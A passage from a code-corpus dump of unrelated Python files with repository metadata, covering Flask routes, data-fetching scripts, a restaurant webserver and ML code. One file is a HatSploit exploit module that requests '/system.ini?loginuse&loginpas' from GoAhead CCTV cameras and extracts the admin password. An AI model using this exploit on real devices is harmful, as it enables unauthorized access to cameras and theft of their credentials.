user = User.query.filter_by(username=username).first()
if user is None:
flash('Invalid user.')
return redirect(url_for('.index'))
page = request.args.get('page', 1, type=int)
pagination = user.followers.paginate(
page, per_page=current_app.config['FLASKY_FOLLOWERS_PER_PAGE'],
error_out=False)
follows = [{'user': item.follower, 'timestamp': item.timestamp}
for item in pagination.items]
return render_template('followers.html', user=user, title="Followers of",
endpoint='.followers', pagination=pagination,
follows=follows)
@main.route('/followed_by/<username>')
def followed_by(username):
user = User.query.filter_by(username=username).first()
if user is None:
flash('Invalid user.')
return redirect(url_for('.index'))
page = request.args.get('page', 1, type=int)
pagination = user.followed.paginate(
page, per_page=current_app.config['FLASKY_FOLLOWERS_PER_PAGE'],
error_out=False)
follows = [{'user': item.followed, 'timestamp': item.timestamp}
for item in pagination.items]
return render_template('followers.html', user=user, title="Followed by",
endpoint='.followed_by', pagination=pagination,
follows=follows)
@main.route('/all')
@login_required
def show_all():
resp = make_response(redirect(url_for('.index')))
resp.set_cookie('show_followed', '', max_age=30*24*60*60)
return resp
@main.route('/followed')
@login_required
def show_followed():
resp = make_response(redirect(url_for('.index')))
resp.set_cookie('show_followed', '1', max_age=30*24*60*60)
return resp
@main.route('/moderate')
@login_required
@permission_required(Permission.MODERATE)
def moderate():
page = request.args.get('page', 1, type=int)
pagination = Comment.query.order_by(Comment.timestamp.desc()).paginate(
page, per_page=current_app.config['FLASKY_COMMENTS_PER_PAGE'],
error_out=False)
comments = pagination.items
return render_template('moderate.html', comments=comments,
pagination=pagination, page=page)
@main.route('/moderate/enable/<int:id>')
@login_required
@permission_required(Permission.MODERATE)
def moderate_enable(id):
comment = Comment.query.get_or_404(id)
comment.disabled = False
db.session.add(comment)
db.session.commit()
return redirect(url_for('.moderate',
page=request.args.get('page', 1, type=int)))
@main.route('/moderate/disable/<int:id>')
@login_required
@permission_required(Permission.MODERATE)
def moderate_disable(id):
comment = Comment.query.get_or_404(id)
comment.disabled = True
db.session.add(comment)
db.session.commit()
return redirect(url_for('.moderate',
page=request.args.get('page', 1, type=int)))
| [
"1306237818@qq.com"
] | 1306237818@qq.com |
14dfa0a6647e1c79cd33c076529270c16b054056 | 09933dafbbc12fe20c405362850ffbf315b01a58 | /src-tag-ent/gen_data.py | fbddab6277c97047553db17485a2206acc0a6875 | [] | no_license | johndpope/advrelation | 1ce1fd4ffc0b7abbea2762c3a8941b469c4f7cf5 | bc77dcfa8669d612aded6a053fff6766798bed14 | refs/heads/master | 2020-03-22T22:55:48.664711 | 2018-03-03T04:43:11 | 2018-03-03T04:43:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | import tensorflow as tf
import config as config_lib
from inputs import dataset, semeval_v2
tf.logging.set_verbosity(tf.logging.INFO)
config = config_lib.get_config()
semeval_text = semeval_v2.SemEvalCleanedTextData(
config.semeval_dir, config.semeval_train_file, config.semeval_test_file)
# length statistics
semeval_text.length_statistics()
# gen vocab
vocab = dataset.Vocab(config.out_dir, config.vocab_file)
# vocab.generate_vocab(semeval_text.tokens())
# # trim embedding
# embed = dataset.Embed(config.out_dir, config.trimmed_embed300_file, config.vocab_file)
# google_embed = dataset.Embed(config.pretrain_embed_dir,
# config.google_embed300_file, config.google_words_file)
# embed.trim_pretrain_embedding(google_embed)
# build SemEval record data
semeval_text.set_vocab(vocab)
tag_encoder = dataset.Label(config.semeval_dir, config.semeval_tags_file)
semeval_text.set_tags_encoder(tag_encoder)
semeval_record = semeval_v2.SemEvalCleanedRecordData(semeval_text,
config.out_dir, config.semeval_train_record, config.semeval_test_record)
semeval_record.generate_data()
# INFO:tensorflow:(percent, quantile) [(50, 18.0), (70, 22.0), (80, 25.0),
# (90, 29.0), (95, 34.0), (98, 40.0), (100, 97.0)]
# INFO:tensorflow:generate vocab to data/generated/vocab.txt
# INFO:tensorflow:trim embedding to data/generated/embed300.trim.npy
# INFO:tensorflow:generate TFRecord data
| [
"lzh00776@163.com"
] | lzh00776@163.com |
671509fb4a1c6376bd546e9658ab0498782e94ab | bece006a37d0041d36416bc888afc96db4046f87 | /BACK/CYBEROPS-master/KAFKA/main_consumer_emotion.py | 4c5685945dfabb36fe9e260c2a52ee72b2e4dc45 | [] | no_license | acorredera/CyberOps | fdd8bca69db1ae98ce4cf36e010286e07972754b | 14f1a8a9c09864af5d84094ae8f8c2f41124d8c4 | refs/heads/master | 2023-03-18T05:16:41.961552 | 2022-09-27T05:07:46 | 2022-09-27T05:07:46 | 134,832,725 | 0 | 1 | null | 2023-03-03T00:49:14 | 2018-05-25T09:10:33 | Jupyter Notebook | UTF-8 | Python | false | false | 872 | py | import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import NewsCore.dao.EmployeeDAOImpl as dao
import KAFKA.Consumer as consumer
import settings as settings
if __name__ == "__main__":
#variables
ip_DCOS_cassandra = settings.ip_DCOS_cassandra
keyspace = settings.keyspace_cassandra
topic = 'cyberops_emotion'
field2Extract = "emotion"
#loading of the cassandra seesion, creatiopn of table (if needded)
daoStatus = dao.EmployeeDAOImpl()
daoStatus.createsession(ip_DCOS_cassandra)
daoStatus.setlogger()
daoStatus.loadkeyspace(keyspace)
daoStatus.create_table() #only if table is not created previously
#run consumer for emotions:
consumer_emotion = consumer.Consumer(topic=topic, field2Extract=field2Extract, DAO=daoStatus, ip_kafka_DCOS=settings.ip_kafka_DCOS)
consumer_emotion.run() | [
"noreply@github.com"
] | acorredera.noreply@github.com |
c53c1612861b020945bf712d8bad9215e5e30760 | 8b2b3f9e706a13caeae1c58eaf9c8421cb7155e0 | /Source/FetchData/Fetch_Data_Stock_CHN_Daily.py | 20696a43119f5f91a09aa99a355d3f8610ccddd3 | [
"MIT"
] | permissive | hyy1101/StockRecommendSystem | 809ce2c001c0df395cc2953bf3a2e6254a591c02 | 188dd006d23a0280106a79895885ad4f9acb4cea | refs/heads/master | 2020-12-02T16:15:19.536621 | 2017-07-07T03:29:21 | 2017-07-07T03:29:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,916 | py | import sys, os, time, datetime, requests, warnings, configparser
import pandas as pd
import numpy as np
import tushare as ts
import concurrent.futures
from tqdm import tqdm
cur_path = os.path.dirname(os.path.abspath(__file__))
for _ in range(2):
root_path = cur_path[0:cur_path.rfind('/', 0, len(cur_path))]
cur_path = root_path
sys.path.append(root_path + "/" + 'Source/DataBase/')
from DB_API import queryStock, storeStock, queryStockList, storeStockList, queryStockPublishDay, storePublishDay
def getStocksList(root_path):
try:
df = queryStockList(root_path, "DB_STOCK", "SHEET_CHN_DAILY")
df.index = df.index.astype(str).str.zfill(6)
except Exception as e:
df = pd.DataFrame()
if df.empty == False: return df
stock_info = ts.get_stock_basics()
listData = pd.DataFrame(stock_info)
#listData.index.name = 'symbol'
#listData.index = listData.index.astype(str).str.zfill(6) #[str(symbol).zfill(6) for symbol in listData.index] #listData.index.astype(str).str.zfill(6)
#print(listData.index)
#listData['symbol'] = listData['symbol'].str.strip()
storeStockList(root_path, "DB_STOCK", "SHEET_CHN_DAILY", listData)
df = queryStockList(root_path, "DB_STOCK", "SHEET_CHN_DAILY")
df.index = df.index.astype(str).str.zfill(6)
return df
def getSingleStock(symbol):
repeat_times = 1
message = ""
df = pd.DataFrame()
for _ in range(repeat_times):
try:
data = ts.get_hist_data(symbol)
data.sort_index(ascending=True, inplace=True)
return data, ""
except Exception as e:
message = symbol + " fetch exception: " + str(e)
continue
return df, message
def getSingleStockByTime(symbol, from_date, till_date):
start = from_date.split('-')
start_y, start_m, start_d = start[0], start[1], start[2] # starting date
end = till_date.split('-')
end_y, end_m, end_d = end[0], end[1], end[2] # until now
repeat_times = 1
message = ""
df = pd.DataFrame()
for _ in range(repeat_times):
try:
data = ts.get_hist_data(symbol, from_date, till_date)
data.sort_index(ascending=True, inplace=True)
return data, ""
except Exception as e:
message = symbol + " fetch exception: " + str(e)
continue
return df, message
def judgeOpenDaysInRange(from_date, to_date):
holidays=["2017-01-01", "2017-01-02",
"2017-01-27", "2017-01-28", "2017-01-29", "2017-01-30", "2017-01-31", "2017-02-01", "2017-02-02",
"2017-04-02", "2017-04-03", "2017-04-04",
"2017-05-01",
"2017-05-28", "2017-05-29", "2017-05-30",
"2017-10-01", "2017-10-02", "2017-10-03", "2017-10-04", "2017-10-05","2017-10-06","2017-10-07","2017-10-08"]
#holidays = cal.holidays(from_date, to_date)
duedays = pd.bdate_range(from_date, to_date)
df = pd.DataFrame()
df['date'] = duedays
df['holiday'] = duedays.isin(holidays)
opendays = df[df['holiday'] == False]
return opendays
def judgeNeedPostDownload(from_date, to_date):
today = datetime.datetime.now()
start_date = pd.Timestamp(from_date)
end_date = pd.Timestamp(to_date)
if start_date > today: return False
if end_date > today: to_date = today.strftime("%Y-%m-%d")
dateList = judgeOpenDaysInRange(from_date, to_date)
if len(dateList) > 0: return True
return False
def updateSingleStockData(root_path, symbol, force_check):
startTime = time.time()
message = ""
if len(symbol) == 0: return startTime, message
till_date = (datetime.datetime.now()).strftime("%Y-%m-%d")
end_date = pd.Timestamp(till_date)
stockData, lastUpdateTime = queryStock(root_path, "DB_STOCK", "SHEET_CHN_DAILY", symbol)
if stockData.empty:
stockData, message = getSingleStock(symbol)
if stockData.empty == False:
storeStock(root_path, "DB_STOCK", "SHEET_CHN_DAILY", symbol, stockData)
return startTime, message
modified = False
first_date = pd.Timestamp(stockData.index[0])
last_date = pd.Timestamp(stockData.index[-1])
updateOnce = end_date > lastUpdateTime
if end_date > last_date and (updateOnce or force_check):
to_date = (last_date + datetime.timedelta(days=1)).strftime("%Y-%m-%d")
if judgeNeedPostDownload(to_date, till_date):
message = message + ", download post data from " + to_date + " to " + till_date
moreStockData, tempMessage = getSingleStockByTime(symbol, to_date, till_date)
message = message + tempMessage
if len(moreStockData) > 0:
if isinstance(moreStockData.index, pd.DatetimeIndex):
moreStockData.index = moreStockData.index.strftime("%Y-%m-%d")
modified = True
stockData = pd.concat([stockData, moreStockData])
stockData.index.name = 'date'
if modified:
stockData = stockData[~stockData.index.duplicated(keep='first')]
storeStock(root_path, "DB_STOCK", "SHEET_CHN_DAILY", symbol, stockData)
elif updateOnce:
stockData = stockData[~stockData.index.duplicated(keep='first')]
storeStock(root_path, "DB_STOCK", "SHEET_CHN_DAILY", symbol, stockData)
message = message + ", nothing updated"
else:
message = ""
return startTime, message
def updateStockData_CHN(root_path, storeType, force_check = False):
symbols = getStocksList(root_path).index.values.tolist()
pbar = tqdm(total=len(symbols))
if storeType == 2:
for symbol in symbols:
startTime, message = updateSingleStockData(root_path, symbol, force_check)
outMessage = '%-*s fetched in: %.4s seconds' % (6, symbol, (time.time() - startTime))
pbar.set_description(outMessage)
pbar.update(1)
if storeType == 1:
log_errors = []
log_update = []
with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:
# Start the load operations and mark each future with its URL
future_to_stock = {executor.submit(updateSingleStockData, root_path, symbol, force_check): symbol for symbol in symbols}
for future in concurrent.futures.as_completed(future_to_stock):
stock = future_to_stock[future]
try:
startTime, message = future.result()
except Exception as exc:
startTime = time.time()
log_errors.append('%r generated an exception: %s' % (stock, exc))
else:
if len(message) > 0: log_update.append(message)
outMessage = '%-*s fetched in: %.4s seconds' % (6, stock, (time.time() - startTime))
pbar.set_description(outMessage)
pbar.update(1)
if len(log_errors) > 0: print(log_errors)
# if len(log_update) > 0: print(log_update)
pbar.close()
return symbols
if __name__ == "__main__":
pd.set_option('precision', 3)
pd.set_option('display.width',1000)
warnings.filterwarnings('ignore', category=pd.io.pytables.PerformanceWarning)
config = configparser.ConfigParser()
config.read(root_path + "/" + "config.ini")
storeType = int(config.get('Setting', 'StoreType'))
if storeType == 1:
from Start_DB_Server import StartServer, ShutdownServer
# start database server (async)
thread = StartServer(root_path)
# wait for db start, the standard procedure should listen to
# the completed event of function "StartServer"
time.sleep(5)
updateStockData_CHN(root_path, storeType)
if storeType == 1:
# stop database server (sync)
time.sleep(5)
ShutdownServer()
| [
"bluelight598@hotmail.com"
] | bluelight598@hotmail.com |
cf7421dbfc41eb8a9f6c8c4c9cbaf20c7230e672 | 7c2bc909efb6db08e57ed3dbff801bece3ac24c8 | /0x04-python-more_data_structures/10-best_score.py | 26dee3325ad643adcaaaa3e9d95024c01c2e8e0f | [] | no_license | EstephaniaCalvoC/holbertonschool-higher_level_programming | 9ed1009702b6aacb3b82b890e1798052adf40f33 | 93c6206b07d6cb51bcbee0bea4054343fca51fad | refs/heads/master | 2023-04-24T19:30:07.828255 | 2021-05-12T19:55:29 | 2021-05-12T19:55:29 | 319,314,341 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 181 | py | #!/usr/bin/python3
def best_score(a_dictionary):
"""Return a key with the biggest integer value"""
return max(a_dictionary, key=a_dictionary.get) if a_dictionary else None
| [
"2177@holbertonschool.com"
] | 2177@holbertonschool.com |
de9e3acfbffdda6fd7604526072436235d2acd6a | 55ebfaee562197eb29694ee7d95d4073239bede1 | /webserver4.py | 9240a1bc8f206992a76f876e395754ad60698250 | [] | no_license | YuriyZaliznyuk/RestaurantMenu | 573561f7389c86db167dd36aaf2a5f8dd6d3e48a | 6af4511625718aabe5b9ee5ea0ccee6fd499b44d | refs/heads/master | 2021-03-12T21:56:57.893046 | 2015-07-17T15:37:07 | 2015-07-17T15:37:07 | 38,889,739 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,650 | py | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import cgi
# import CRUD Operations from Lesson 1
from database_setup import Base, Restaurant, MenuItem
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
# Create session and connect to DB
engine = create_engine('sqlite:///restaurantmenu.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
class webServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
try:
# Objective 3 Step 2 - Create /restarants/new page
if self.path.endswith("/restaurants/new"):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
output = ""
output += "<html><body>"
output += "<h1>Make a New Restaurant</h1>"
output += "<form method = 'POST' enctype='multipart/form-data' action = '/restaurants/new'>"
output += "<input name = 'newRestaurantName' type = 'text' placeholder = 'New Restaurant Name'>"
output += "<input type='submit' value='Create'>"
output += "</form></html></body>"
self.wfile.write(output)
return
if self.path.endswith("/edit"):
restaurantIDPath = self.path.split("/")[2]
myRestaurantQuery = session.query(Restaurant).filter_by(id = restaurantIDPath).one()
if myRestaurantQuery:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
output = "<html><body>"
output += "<h1>"
output += myRestaurantQuery.name
output += "</h1>"
output += "<form method='POST' enctype='multipart/form-data' action = '/restaurants/%s/edit' >" % restaurantIDPath
output += "<input name = 'newRestaurantName' type='text' placeholder = '%s' >" % myRestaurantQuery.name
output += "<input type = 'submit' value = 'Rename'>"
output += "</form>"
output += "</body></html>"
self.wfile.write(output)
if self.path.endswith("/restaurants"):
restaurants = session.query(Restaurant).all()
output = ""
# Objective 3 Step 1 - Create a Link to create a new menu item
output += "<a href = '/restaurants/new' > Make a New Restaurant Here </a></br></br>"
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
output += "<html><body>"
for restaurant in restaurants:
output += restaurant.name
output += "</br>"
# Objective 2 -- Add Edit and Delete Links
# Objective 4 -- Replace Edit href
output += "<a href ='/restaurants/%s/edit' >Edit </a> " % restaurant.id
output += "</br>"
output += "<a href =' #'> Delete </a>"
output += "</br></br></br>"
output += "</body></html>"
self.wfile.write(output)
return
except IOError:
self.send_error(404, 'File Not Found: %s' % self.path)
# Objective 3 Step 3- Make POST method
def do_POST(self):
try:
if self.path.endswith("/edit"):
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
if ctype == 'multipart/form-data':
fields = cgi.parse_multipart(self.rfile, pdict)
messagecontent = fields.get('newRestaurantName')
restaurantIDPath = self.path.split("/")[2]
myRestaurantQuery = session.query(Restaurant).filter_by(id = restaurantIDPath).one()
if myRestaurantQuery != []:
myRestaurantQuery.name = messagecontent[0]
session.add(myRestaurantQuery)
session.commit()
self.send_response(301)
self.send_header('Content-type', 'text/html')
self.send_header('Location', '/restaurants')
self.end_headers()
if self.path.endswith("/restaurants/new"):
ctype, pdict = cgi.parse_header(self.headers.getheader('content-type'))
if ctype == 'multipart/form-data':
fields = cgi.parse_multipart(self.rfile, pdict)
messagecontent = fields.get('newRestaurantName')
# Create new Restaurant Object
newRestaurant = Restaurant(name=messagecontent[0])
session.add(newRestaurant)
session.commit()
self.send_response(301)
self.send_header('Content-type', 'text/html')
self.send_header('Location', '/restaurants')
self.end_headers()
except:
pass
def main():
try:
server = HTTPServer(('', 8080), webServerHandler)
print 'Web server running...open localhost:8080/restaurants in your browser'
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down server'
server.socket.close()
if __name__ == '__main__':
main() | [
"yuriy.zaliznyuk@gmail.com"
] | yuriy.zaliznyuk@gmail.com |
e0b39a708b67f44501522e21058f0a57a5d4d895 | 727d968a63a6dfdd05a7e0f7abc1a3be7a910ca3 | /covid_api_github.py | 0869f9779309cd74f0c016051880af43e0697ef9 | [] | no_license | ericstar20/COVID19_api | 3a4501f905172b9705e72798af8d9bb4027a2a9a | 4313e073992a975878088135a09cf9bc6e951175 | refs/heads/master | 2022-11-27T21:54:06.581868 | 2020-07-17T16:27:04 | 2020-07-17T16:27:04 | 280,244,263 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,926 | py | def covid_api_sql():
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# API
import requests
import json
# DB
import pymysql
from sqlalchemy import create_engine
pymysql.install_as_MySQLdb()
# AWS
import aws_config
# Set up API keys to get access permission
def getStats(country):
api_url = 'https://api.smartable.ai/coronavirus/stats/'+country
api_params = {
'Cache-Control': 'no-cache',
'Subscription-Key': 'your key',
}
r = requests.get(url=api_url, params=api_params)
return r.text
# Get Data
data = getStats('global')
jsonData = json.loads(data)
jsonData.keys()
# Create three dataframe. One is Global total, the other is each country(state) info.
# Global df
update_T = jsonData['updatedDateTime']
totalConfirmedCases = jsonData['stats']['totalConfirmedCases']
newlyConfirmedCases = jsonData['stats']['newlyConfirmedCases']
totalDeaths = jsonData['stats']['totalDeaths']
newDeaths = jsonData['stats']['newDeaths']
totalRecoveredCases = jsonData['stats']['totalRecoveredCases']
newlyRecoveredCases = jsonData['stats']['newlyRecoveredCases']
global_list = [[update_T, totalConfirmedCases, totalDeaths, totalRecoveredCases, newlyConfirmedCases, newDeaths, newlyRecoveredCases]]
global_col = ['updateTime', 'totalConfirmedCases', 'totalDeaths', 'totalRecoveredCases', 'newlyConfirmedCases', 'newDeaths', 'newlyRecoveredCases']
global_df = pd.DataFrame(data=global_list, columns = global_col)
global_df['updateTime']=pd.to_datetime(global_df['updateTime'])
#global_df.head()
# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #
# histroy df
history_df = pd.DataFrame(jsonData['stats']['history'])
history_df['date']=pd.to_datetime(history_df['date'])
#history_df.head()
# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #
# Stats df
stats = pd.DataFrame(jsonData['stats']['breakdowns'])
location_norm = pd.json_normalize(stats['location'])
stats_df = pd.concat([location_norm, stats], axis=1).drop('location', axis=1)
stats_df['updateTime'] = update_T
stats_df['updateTime']=pd.to_datetime(stats_df['updateTime'])
#stats_df.head()
# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #
# Open database connection (local)
db = pymysql.connect("host","name","password","database name" )
# prepare a cursor object using cursor() method
cursor = db.cursor()
# execute SQL query using execute() method.
cursor.execute("SELECT VERSION()")
# Fetch a single row using fetchone() method.
data = cursor.fetchone()
# print ("Database version : %s " % data)
# disconnect from server
db.close()
# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #
# Insert dfs to locl mysql
engine = create_engine('mysql://name:password@host:port/database') #change to connect your mysql
#if you want to create a new table
global_df.to_sql(name='globalView',con=engine,if_exists='replace',index=False)
history_df.to_sql(name='history',con=engine,if_exists='replace',index=False)
stats_df.to_sql(name='statsView',con=engine,if_exists='replace',index=False)
# --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- #
# Open database connection (AWS)
connection = pymysql.connect(host=aws_config.host,
user=aws_config.user,
password=aws_config.passwd)
with connection:
cur = connection.cursor()
cur.execute("SELECT VERSION()")
version = cur.fetchone()
#print("Database version: {} ".format(version[0]))
# Insert dfs to locl mysql
engine = create_engine('mysql://{}:{}@{}:{}/{}'.format(aws_config.user,aws_config.passwd,aws_config.host,aws_config.port,aws_config.db_name)) #change to connect your mysql
#if you want to create a new table
global_df.to_sql(name='globalView',con=engine,if_exists='replace',index=False)
history_df.to_sql(name='history',con=engine,if_exists='replace',index=False)
stats_df.to_sql(name='statsView',con=engine,if_exists='replace',index=False)
| [
"noreply@github.com"
] | ericstar20.noreply@github.com |
c4fd4774aaf0e10c3720251b62ae4f7fd5eca3ae | 437428a48278b4e9bc04e1b8acbb33199f409376 | /modules/exploit/unix/cctv/goahead_password_disclosure.py | ae2a949fa5f2033187282244644b19db5808d163 | [
"MIT"
] | permissive | happylaodu/HatSploit | 06d18ba2590456241ba61273d9f3d662a8bb26ec | 9d53f3db85ce38483c6e7d16570ac233c5dd93cf | refs/heads/main | 2023-04-30T20:18:37.090185 | 2021-06-02T20:23:08 | 2021-06-02T20:23:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,399 | py | #!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from core.lib.module import Module
from utils.http.http import HTTPClient
from utils.string.string import StringTools
class HatSploitModule(Module, HTTPClient, StringTools):
details = {
'Name': "CCTV GoAhead Camera Password Disclosure",
'Module': "exploit/unix/cctv/goahead_password_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080)',
'Pierre Kim (pierrekim)'
],
'Description': "CCTV GoAhead Camera password disclosure exploit.",
'Comments': [
''
],
'Platform': "unix",
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 81,
'Type': "port",
'Required': True
},
'USERNAME': {
'Description': "Default username.",
'Value': "admin",
'Type': None,
'Required': True
}
}
def exploit(self, remote_host, remote_port, username):
self.output_process("Generating payload...")
payload = '/system.ini?loginuse&loginpas'
self.output_process("Sending payload...")
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path=payload
)
if response is None or response.status_code != 200:
self.output_error("Failed to send payload!")
return
gathered_data = response.text
strings = self.extract_strings(gathered_data)
if username in strings:
username_index = strings.index(username)
password = strings[username_index + 1]
self.print_table("Credentials", ('Username', 'Password'), (username, password))
else:
self.output_warning(f"Target vulnerable, but default username is not {username}.")
def run(self):
remote_host, remote_port, username = self.parse_options(self.options)
self.output_process(f"Exploiting {remote_host}...")
self.exploit(remote_host, remote_port, username)
| [
"enty8080@gmail.com"
] | enty8080@gmail.com |
e0d4813f092a2ac5c5e8a38b53dd058711758ebb | cf6e0374bede75062e9da39895ae576d07f4839c | /extract-AP-Images/extract-AP-images.py | 7f422fcd27470e9b79c3e843b759dd4804357a3a | [] | no_license | gingmar/semfio-ekahau | 6e74017f699e8aa895b70cf3b62ad39d4096fd4a | fa04ed243c51093e4f82b8e2f25fe02d6eeae66d | refs/heads/master | 2023-07-07T16:57:43.054514 | 2021-08-24T01:25:56 | 2021-08-24T01:25:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,042 | py | """
Written by Francois Verges (@VergesFrancois)
This script will extract all image notes attached to an AP objects of an
Ekahau project file (.esx). It will place the pictures in a new directory.
Sub directories will be created for each floors.
This script will also work if you have multiple pictures per AP note
Currently working for Ekahau version 10.2, 10.1 & 10 project files
"""
import argparse
import time
import zipfile
import json
import shutil
import pathlib
import os
def main():
"""
This function will extract the images located into the AP notes and rename them using the AP Name
"""
parser = argparse.ArgumentParser(description='Extract images located in the AP notes and rename them using the AP name')
parser.add_argument('file', metavar='esx_file', help='Ekahau project file')
args = parser.parse_args()
# Load & Unzip the Ekahau Project File
current_filename = pathlib.PurePath(args.file).stem
with zipfile.ZipFile(args.file,'r') as myzip:
myzip.extractall(current_filename)
# Load the notes.json file into the notes Dictionary
with myzip.open('notes.json') as json_file:
notes = json.load(json_file)
# Load the accessPoints.json file into the accessPoints dictionary
with myzip.open('accessPoints.json') as json_file:
accessPoints = json.load(json_file)
# Load the floorPlans.json file into the floorPlans dictionary
with myzip.open('floorPlans.json') as json_file:
floorPlans = json.load(json_file)
# Create a new directory to place the new image in
newpath = os.path.abspath(pathlib.PurePath()) + "/AP-Images"
if not os.path.exists(newpath):
os.makedirs(newpath)
# Create one sub directory per floor under the /AP-Images directrory
for floor in floorPlans['floorPlans']:
sub = newpath + '/' + floor['name']
if not os.path.exists(sub):
os.makedirs(sub)
# Move all the AP Images on this floor into the corresponding directory
for ap in accessPoints['accessPoints']:
if 'location' in ap.keys() and len(ap['noteIds']) > 0:
if ap['location']['floorPlanId'] == floor['id']:
if 'noteIds' in ap.keys():
count = 0
for noteId in ap['noteIds']:
for note in notes['notes']:
if note['id'] == noteId and len(note['imageIds']) > 0:
image_count = count + 1
for image in note['imageIds']:
image_full_path = os.getcwd() + '/' + current_filename + '/image-' + image
if len(note['imageIds']) > 1 or len(ap['noteIds']) > 1:
dst = newpath + '/' + floor['name'] + '/'+ ap['name'] + '-' + str(image_count) + '.png'
else:
dst = newpath + '/' + floor['name'] + '/'+ ap['name'] + '.png'
shutil.copy(image_full_path, dst)
image_count += 1
count = image_count - 1
# Clean Up
shutil.rmtree(current_filename)
if __name__ == "__main__":
start_time = time.time()
print('** Extracting AP picture notes...')
main()
run_time = time.time() - start_time
print("** Time to run: %s sec" % round(run_time,2))
| [
"fverges@semfionetworks.com"
] | fverges@semfionetworks.com |
ef567234d6477e2d147942c523b0ffd84b76b2c7 | 8f453ebb619acb23d2925f7ceb9b0c244e645390 | /ClassifyParkinsons.py | 0f2b46ca449a357c52c165eda6b0830490adb626 | [] | no_license | pranithasurya/MachineLearning | 5fa6927d03a29ac5ec60a0cab1096bafdc6b80fe | 2d07da75335867eba1591841351c3db351d07c23 | refs/heads/master | 2021-01-10T05:17:50.137654 | 2016-01-18T05:48:16 | 2016-01-18T05:48:16 | 49,853,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,467 | py | import numpy as np
from sklearn import svm
from sklearn.metrics import accuracy_score
def loadData():
file=open("parkinsons/data")
line=file.readline()
result=[]
while(line!=''):
a=line.split()
a=map(float,a)
result.append(a)
line=file.readline()
a=np.array(result)
print a
return a
def loadTrueClass():
file=open("parkinsons/trueclass")
line=file.readline()
result=[]
while(line!=''):
a=line.split()
a=map(int,a)
result.append(a)
line=file.readline()
a=np.array(result)
return a
def loadTrainingData(x):
f=open("Parkinsons/random_class.%d" %x,"r")
print "------------------------------------------------------------------------------"
print "Parkinsons/random_class.%d"%x
line=f.readline()
result=[]
while(line!=''):
a=line.split()
result.append(a)
line=f.readline()
a=np.array(result)
a=a.astype(int)
return a
def classify(data, trueclass, traindata, final_set,a):
X=np.vstack(data[traindata[:,1],:])
#np.savetxt("parkinsons/foo.csv",x, fmt='%0.5f',delimiter=",")
b=[]
b.append(traindata[:,1])
C = np.searchsorted(a, b)
D = np.delete(np.arange(np.alen(a)), C)
D= np.array(D)
D=D.reshape(D.size,-1)
true_labels = np.ravel(np.vstack(trueclass[D[:,0],0]))
test_data = np.vstack(data[D[:,0],:])
#print test_data.shape
#np.savetxt("parkinsons/foo.csv",test_data, fmt='%0.6s')
y=np.ravel(np.vstack(traindata[:,0]))
clf=svm.SVC(kernel='linear')
clf.fit(X,y)
labels=clf.predict(test_data) #predicting true labels for the remaining rows
predicted_labels = labels.reshape(labels.size,-1)
np.savetxt("parkinsons/foo%d.csv"%final_set, np.concatenate((test_data, predicted_labels,np.vstack(trueclass[D[:,0],0])), axis=1),fmt='%0.5f',delimiter=",")
print true_labels
print labels
misclassify_rate = 1-accuracy_score(true_labels,labels)
print "Misclassification rate = %f" %misclassify_rate
return misclassify_rate
data = loadData() #loading original data
trueclass = loadTrueClass() #loading true labels
error=0
for i in range(0,10,1): #looping through 10 training data sets
traindata=loadTrainingData(i) #loading each training file
a=[]
for j in range(0,195,1):
a.append(j)
misclassify_rate=classify(data, trueclass, traindata,i,a) #classification based on each training set. Also the parameter passing is call by value here
error = error+misclassify_rate
print error
error = error/10 #average of error across 10 training sets
print "Average Error= %0.3f" %error
| [
"pranitha.andalam@gmail.com"
] | pranitha.andalam@gmail.com |
